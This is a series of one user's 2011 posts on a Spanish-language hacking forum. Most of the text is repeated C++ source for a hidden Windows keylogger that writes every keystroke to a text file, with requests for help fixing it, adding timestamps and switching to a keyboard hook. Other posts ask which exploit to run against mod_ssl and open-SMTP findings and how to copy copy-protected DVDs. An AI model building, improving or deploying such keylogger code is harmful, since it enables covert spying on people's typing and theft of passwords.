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111  Seguridad Informática / Análisis y Diseño de Malware / TEMA CERRADO Duda con Keylogger C++ en: 12 Junio 2011, 16:59 pm
Perfecto Fantasma306 has dado en el clavo, me has dado el toque que me faltaba, ademas de que tu codigo es mas limpio y "chupa" menos de la CPU que el mio.

Mil gracias, espero estemos mas en contacto
gracias tambien a jaunx y a BlackZeroX por su ayuda tambien

un cordial saludooooo
112  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda con Keylogger C++ en: 12 Junio 2011, 16:19 pm
Citar
en Vista y Seven, debido a la uac, una aplicación que no se ejecuta como administrador no puede crear/modificar un archivo en c:... Diría que la cosa va por ahí.
Valla!! Viene por defecto no?? Pero se podria quitar? o eso queda limitado siempre?


Citar
Hola, no se si es solo al escribir tu codigo aqui, pero creo que en el segundo codigo te has olvidado:

Si, error mio al pegarlo en el post, fue al escribir los comentarios cuando me lo comí sin querer,  :D

luego Fastama306 he probado todo lo que me has dicho pero me salta un error en esta linea

Citar
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <string>
#include <direct.h>
#include <windows.h>

using namespace std;

int main()
{
 FreeConsole();
   
      string q="q";
      string w="w";
      string e="e";
      string r="r";
      string t="t";
      string y="y";
      string u="u";
      string i="i";
      string o="o";
      string p="p";
      string a="a";
      string s="s";
      string d="d";
      string f="f";
      string g="g";
      string h="h";
      string j="j";
      string k="k";
      string l="l";
      string z="z";
      string x="x";
      string c="c";
      string v="v";
      string b="b";
      string n="n";
      string m="m";
      string enter="[ENTER]";
      string backspace="[BACKSPACE]";
      string tab="[TAB]";
      string spacebar=" ";



while(1)
 {
         Sleep(20);
         
     
            mkdir("C:\\registro\log.txt");
           
            Sleep(20);   
             
           if (GetAsyncKeyState('Q')==-32767)
           {log << q;} <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<ERROR>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
           
           if (GetAsyncKeyState('W')==-32767)
           {log << w;}
           
           if (GetAsyncKeyState('E')==-32767)
           {log << e;}
           
           if (GetAsyncKeyState('R')==-32767)
           {log << r;}
           
           if (GetAsyncKeyState('T')==-32767)
           {log << t;}
           
           if (GetAsyncKeyState('Y')==-32767)
           {log << y;}
           
           if (GetAsyncKeyState('U')==-32767)
           {log << u;}
           
           if (GetAsyncKeyState('I')==-32767)
           {log << i;}
           
           if (GetAsyncKeyState('O')==-32767)
           {log << o;}
           
           if (GetAsyncKeyState('P')==-32767)
           {log << p;}
           
           if (GetAsyncKeyState('A')==-32767)
           {log << a;}
           
           if (GetAsyncKeyState('S')==-32767)
           {log << s;}
           
           if (GetAsyncKeyState('D')==-32767)
           {log << d;}
           
           if (GetAsyncKeyState('F')==-32767)
           {log << f;}
           
           if (GetAsyncKeyState('G')==-32767)
           {log << g;}
           
           if (GetAsyncKeyState('H')==-32767)
           {log << h;}
           
           if (GetAsyncKeyState('J')==-32767)
           {log << j;}
           
           if (GetAsyncKeyState('K')==-32767)
           {log << k;}
           
           if (GetAsyncKeyState('L')==-32767)
           {log << l;}
           
           if (GetAsyncKeyState('Z')==-32767)
           {log << z;}
           
           if (GetAsyncKeyState('X')==-32767)
           {log << x;}
           
           if (GetAsyncKeyState('C')==-32767)
           {log << c;}
           
           if (GetAsyncKeyState('V')==-32767)
           {log << v;}
           
           if (GetAsyncKeyState('B')==-32767)
           {log << b;}
           
           if (GetAsyncKeyState('N')==-32767)
           {log << n;}
           
           if (GetAsyncKeyState('M')==-32767)
           {log << m;}
           
           if (GetAsyncKeyState('1')==-32767)
           {log << 1;}
           
           if (GetAsyncKeyState('2')==-32767)
           {log << 2;}
           
           if (GetAsyncKeyState('3')==-32767)
           {log << 3;}
           
           if (GetAsyncKeyState('4')==-32767)
           {log << 4;}
           
           if (GetAsyncKeyState('5')==-32767)
           {log << 5;}
           
           if (GetAsyncKeyState('6')==-32767)
           {log << 6;}
           
           if (GetAsyncKeyState('7')==-32767)
           {log << 7;}
           
           if (GetAsyncKeyState('8')==-32767)
           {log << 8;}
           
           if (GetAsyncKeyState('9')==-32767)
           {log << 9;}
           
           if (GetAsyncKeyState('0')==-32767)
           {log << 0;}
           
           if (GetAsyncKeyState(13)==-32767)
           {log << enter;}
           
           if (GetAsyncKeyState(8)==-32767)
           {log << backspace;}
           
           if (GetAsyncKeyState(9)==-32767)
           {log << tab;}
           
           if (GetAsyncKeyState(32)==-32767)
           {log << spacebar;}
           
 
           log.close();
                 
 }/*while*/
 return 0;
}
113  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda con Keylogger C++ en: 11 Junio 2011, 12:25 pm
Citar
Mejor instala un Hook al teclado haci te ahorras el alto consumo del procesador ( While ).
Y me podrias orientar como??

Citar
la primera es q lo e probado en dos de mis equipos, en uno parece que realiza la funcion correctamente, crea un documento de txt en C: pero en el otro equipo no aparece!! A que puede deberse esto??

Sigo sin saber porque no funciona en algunos equipos , puede ser por el S.O?

Citar
podria adaptarse algun codigo que te especifique la hora, o algo asi un poco más avanzadooo???

Una vez resueltas las dudas me gustaria agregarle esto, agradeceria vuestra ayuda


gracias

un saludo

wh
114  Comunicaciones / Mensajería / Re: IRC HACKER en: 11 Junio 2011, 10:59 am
Gracias a BoF que tan amablemente me ha facilitado la informacion

Irc.freenode.com canal ##0day

Os espero a todos alli

Un saludoo

Atentamente

WiseHidden
115  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda con Keylogger C++ en: 11 Junio 2011, 10:55 am
Esto si que es curioso, he pasado a limpio el código en el equipo que si funcionaba, y resulta que ahora tampoco va!!!!

Alguien me puede explicar el porque de esto?? lo agradeceria.

Me he tomado la molestia de comentar la mayoria de las sentencias, si encuentran algun error agradeceria que lo notificaran, asi el codigo sera mas facil de estudiar.

CODIGO:

Código:
//KEYLOGGER KEYHIDDEN v0.1 (beta)
// By WiseHidden Junio 2011

#include //Libreria que controla ciertos recursos del sistema operativo.
#include <iostream> //Parte del a STL que contiene los algoritmos estándar de E/S.
#include <fstream> //Flujos hacia/desde ficheros.
#include <windows.h>

using namespace std; //Esto permite al programador tener acceso a todos los miembros del namespace y escribir instrucciones mas concisas

int main() //  Todo programa en Cpp necesita esta funcion
{
    
    FreeConsole(); //Oculta la consola del programa pero el programa trabaja en segundo plano
    string a="a";  // Cadenas de Texto
    string b="b";  // Cadenas de Texto
    string c="c";  // Cadenas de Texto
    string d="d";  // Cadenas de Texto
    string e="e";  // Cadenas de Texto
    string f="f";  // Cadenas de Texto
    string g="g";  // Cadenas de Texto
    string h="h";  // Cadenas de Texto
    string i="i";  // Cadenas de Texto
    string j="j";  // Cadenas de Texto
    string k="k";  // Cadenas de Texto
    string l="l";  // Cadenas de Texto
    string m="m";  // Cadenas de Texto
    string n="n";  // Cadenas de Texto
    string o="o";  // Cadenas de Texto
    string p="p";  // Cadenas de Texto
    string q="q";  // Cadenas de Texto
    string r="r";  // Cadenas de Texto
    string s="s";  // Cadenas de Texto
    string t="t";  // Cadenas de Texto
    string u="u";  // Cadenas de Texto
    string w="w";  // Cadenas de Texto
    string x="x";  // Cadenas de Texto
    string y="y";  // Cadenas de Texto
    string z="z";  // Cadenas de Texto
    string enter="[ENTER]";  // Cadenas de Texto
    string backspace="[BACKSPACE]";  // Cadenas de Texto
    string tab="[TAB]";  // Cadenas de Texto
    string spacebar=" ";  // Cadenas de Texto
    
    while(1) //Nos permite repetir la ejecución de un bloque hasta tanto una condición booleana se vuelva falsa.
    {
       Sleep(20); //Retardado en 0,2 milisegundos
       ofstream log("C:\log.txt", ios::app); //Esta funcion creara un documento .txt en la ruta que le hemos designado
       Sleep(20);  //Retardado en 0,2 milisegundos
      
       if(GetAsyncKeyState('A')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<a;}
       if(GetAsyncKeyState('B')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<b;}
       if(GetAsyncKeyState('C')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<c;}
       if(GetAsyncKeyState('D')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<d;}
       if(GetAsyncKeyState('E')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<e;}
       if(GetAsyncKeyState('F')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<f;}
       if(GetAsyncKeyState('G')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<g;}
       if(GetAsyncKeyState('H')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<h;}
       if(GetAsyncKeyState('I')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<i;}
       if(GetAsyncKeyState('J')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<j;}
       if(GetAsyncKeyState('K')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<k;}
       if(GetAsyncKeyState('L')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<l;}
       if(GetAsyncKeyState('M')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<m;}
       if(GetAsyncKeyState('N')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<n;}
       if(GetAsyncKeyState('O')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<o;}
       if(GetAsyncKeyState('P')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<p;}
       if(GetAsyncKeyState('Q')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<q;}
       if(GetAsyncKeyState('R')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<r;}
       if(GetAsyncKeyState('S')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<s;}
       if(GetAsyncKeyState('T')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<t;}
       if(GetAsyncKeyState('U')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<u;}
       if(GetAsyncKeyState('W')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<w;}
       if(GetAsyncKeyState('X')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<x;}
       if(GetAsyncKeyState('Y')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<y;}
       if(GetAsyncKeyState('Z')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<z;}
       if(GetAsyncKeyState('0')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<0;}
       if(GetAsyncKeyState('1')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<1;}
       if(GetAsyncKeyState('2')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<2;}
       if(GetAsyncKeyState('3')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<3;}
       if(GetAsyncKeyState('4')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<4;}
       if(GetAsyncKeyState('5')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<5;}
       if(GetAsyncKeyState('6')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<6;}
       if(GetAsyncKeyState('7')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<7;}
       if(GetAsyncKeyState('8')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<8;}
       if(GetAsyncKeyState('9')==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<9;}
       if(GetAsyncKeyState(13)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<enter;}
       if(GetAsyncKeyState(8)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<backspace;}
       if(GetAsyncKeyState(9)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<tab;}
       if(GetAsyncKeyState(32)==-32767) //Esta función devuelve un valor o otro depende de si has pulsado la tecla o no
       {log<<spacebar;}
       log.close();
       }/*while*/
       return 0;
      
            }

UN SALUDO

Atentamente

WiseHidden
116  Seguridad Informática / Análisis y Diseño de Malware / Duda con Keylogger C++ en: 10 Junio 2011, 23:41 pm
Hola a todos, tengo un par de dudas acerca de este codigo, la primera es q lo e probado en dos de mis equipos, en uno parece que realiza la funcion correctamente, crea un documento de txt en C: pero en el otro equipo no aparece!!

A que puede deberse esto??

La segunda duda es que el keylogger en si es muy sencillo, copia todo lo tecleado en un *.txt pero podria adaptarse algun codigo que te especifique la hora, o algo asi un poco más avanzadooo???

Os expongo aqui el codigo (el creador de este programa es kokehack) Lo encontre en la red.

Código:
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <windows.h>

using namespace std;

int main()
{
 FreeConsole();
    
      string q="q";
      string w="w";
      string e="e";
      string r="r";
      string t="t";
      string y="y";
      string u="u";
      string i="i";
      string o="o";
      string p="p";
      string a="a";
      string s="s";
      string d="d";
      string f="f";
      string g="g";
      string h="h";
      string j="j";
      string k="k";
      string l="l";
      string z="z";
      string x="x";
      string c="c";
      string v="v";
      string b="b";
      string n="n";
      string m="m";
      string enter="[ENTER]";
      string backspace="[BACKSPACE]";
      string tab="[TAB]";
      string spacebar=" ";



while(1)
 {
         Sleep(20);
        
         ofstream log("C:\\log.txt", ios::app);
            
            
            Sleep(20);    
           if(GetAsyncKeyState('Q')==-32767)
           {log << q;}
          
           if (GetAsyncKeyState('W')==-32767)
           {log << w;}
          
           if (GetAsyncKeyState('E')==-32767)
           {log << e;}
          
           if (GetAsyncKeyState('R')==-32767)
           {log << r;}
          
           if (GetAsyncKeyState('T')==-32767)
           {log << t;}
          
           if (GetAsyncKeyState('Y')==-32767)
           {log << y;}
          
           if (GetAsyncKeyState('U')==-32767)
           {log << u;}
          
           if (GetAsyncKeyState('I')==-32767)
           {log << i;}
          
           if (GetAsyncKeyState('O')==-32767)
           {log << o;}
          
           if (GetAsyncKeyState('P')==-32767)
           {log << p;}
          
           if (GetAsyncKeyState('A')==-32767)
           {log << a;}
          
           if (GetAsyncKeyState('S')==-32767)
           {log << s;}
          
           if (GetAsyncKeyState('D')==-32767)
           {log << d;}
          
           if (GetAsyncKeyState('F')==-32767)
           {log << f;}
          
           if (GetAsyncKeyState('G')==-32767)
           {log << g;}
          
           if (GetAsyncKeyState('H')==-32767)
           {log << h;}
          
           if (GetAsyncKeyState('J')==-32767)
           {log << j;}
          
           if (GetAsyncKeyState('K')==-32767)
           {log << k;}
          
           if (GetAsyncKeyState('L')==-32767)
           {log << l;}
          
           if (GetAsyncKeyState('Z')==-32767)
           {log << z;}
          
           if (GetAsyncKeyState('X')==-32767)
           {log << x;}
          
           if (GetAsyncKeyState('C')==-32767)
           {log << c;}
          
           if (GetAsyncKeyState('V')==-32767)
           {log << v;}
          
           if (GetAsyncKeyState('B')==-32767)
           {log << b;}
          
           if (GetAsyncKeyState('N')==-32767)
           {log << n;}
          
           if (GetAsyncKeyState('M')==-32767)
           {log << m;}
          
           if (GetAsyncKeyState('1')==-32767)
           {log << 1;}
          
           if (GetAsyncKeyState('2')==-32767)
           {log << 2;}
          
           if (GetAsyncKeyState('3')==-32767)
           {log << 3;}
          
           if (GetAsyncKeyState('4')==-32767)
           {log << 4;}
          
           if (GetAsyncKeyState('5')==-32767)
           {log << 5;}
          
           if (GetAsyncKeyState('6')==-32767)
           {log << 6;}
          
           if (GetAsyncKeyState('7')==-32767)
           {log << 7;}
          
           if (GetAsyncKeyState('8')==-32767)
           {log << 8;}
          
           if (GetAsyncKeyState('9')==-32767)
           {log << 9;}
          
           if (GetAsyncKeyState('0')==-32767)
           {log << 0;}
          
           if (GetAsyncKeyState(13)==-32767)
           {log << enter;}
          
           if (GetAsyncKeyState(8)==-32767)
           {log << backspace;}
          
           if (GetAsyncKeyState(9)==-32767)
           {log << tab;}
          
           if (GetAsyncKeyState(32)==-32767)
           {log << spacebar;}
          
  
           log.close();
                
 }/*while*/
 return 0;
}

gracias

Un cordial saludoo

WH
117  Seguridad Informática / Hacking / Re: Duda con el SSS (Escaneador de Puertos) en: 10 Junio 2011, 12:32 pm
Buffers Overflow: Es un error de software que se produce cuando un programa no controla adecuadamente la cantidad de datos que se copian sobre un área de memoria reservada a tal efecto (buffer), de forma que si dicha cantidad es superior a la capacidad preasignada los bytes sobrantes se almacenan en zonas de memoria adyacentes, sobrescribiendo su contenido original

ShellCodes: código ejecutable especialmente preparado que se copia al host objeto del ataque para obtener los privilegios del programa vulnerable.

Exploits: es una pieza de software, un fragmento de datos, o una secuencia de comandos con el fin de automatizar el aprovechamiento de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o componente electrónico


VULNERABILIDADES


mod_ssl buffer Overflow Condition:  Se ha descubierto un desbordamiento de búfer en "mod_ssl" que permite,
bajo circunstancias muy especiales, la ejecución de código en el
servidor.
"mod_ssl" es un módulo Apache que le dota de la capacidad de soportar
sesiones SSL (Secure Socket Layer, el protocolo utilizado en HTTPS).

Las versiones de "mod_ssl" previas a la 2.8.7 utilizan la librería
"OpenSSL" de forma insegura, permitiendo un desbordamiento de búfer en
la gestión de la caché de sesiones SSL. Aunque la posibilidad de
explotación del problema parece bastante complicada en un entorno de
producción, la versión 2.8.7 de "mod_ssl" soluciona el problema de forma
proactiva.

La vulnerabilidad afecta también a "apache-ssl", ya que es un proyecto
basado en "mod_ssl". En este caso la recomendación es actualizar a la
versión 1.3.22+1.46.

SMTP without AuthLogin: Esta vulnerabilidad te permite mandar emails por el puerto 25, y no requiere de ningun exploit.

Bueno aunque ya empiezo a "vislumbrar" la primera capa del Iceberg aun ando muy perdido, he estado hojeando por la red sobre estas vulnerabilidades pero casi to la informaciçon viene en ingles o estan colgadas, alguien podria orientarme que tipo de exploit necesitaria y como explotarlo. REPITO EL ATAQUE SERA CONTRA MI WEB, DE ESE MODO LA PROTEGERE MEJOR

Gracias por todo

Un saludo

WH

118  Comunicaciones / Mensajería / Re: IRC HACKER en: 9 Junio 2011, 23:11 pm
Si, he probado un par de veces conectarme al irc del foro, pero no habia nadie, asi q me extraño muchisimo!!

Citar
. Depende del servidor en que te suelas mover y eso

Disculpa mi ignorancia pero..... Depende del servidor en que me mueva? No entiendo!!

gracias
119  Comunicaciones / Mensajería / IRC HACKER en: 9 Junio 2011, 22:10 pm
Buenas a todos, llevo ya un par de años en el foro, y reconozco que es lo mejor que me ha pasado, pues he conocido a mucha gente que me han ayudado en todo lo que he necesitado, al igual que muchos me agradecen la ayuda o aporte que en algun momento yo les haya podido facilitar, la cosa que estoy buscando un buen irc donde hallan camaradas que les apasione este grandisimo mundo del hacking (Siempre desde el punto de vista etico) asi pues podrias orientarme un buen canal donde participar diariamente??

Os lo agradeceria de corazon

Un saludoooo

Atentamente
Wisehidden
120  Informática / Software / Re: Como funciona el grabado de un dvd original en: 7 Junio 2011, 18:16 pm

Citar
Si tienes el any dvd y el disco original lo puedes copiar con todo (menú,idiomas,extras,etc).

Citar
Tendría que estar el dvd sin protección para poder grabarlo de esa forma.

Es posible con el any dvd grabarlo si tener la proteccion del dvd??
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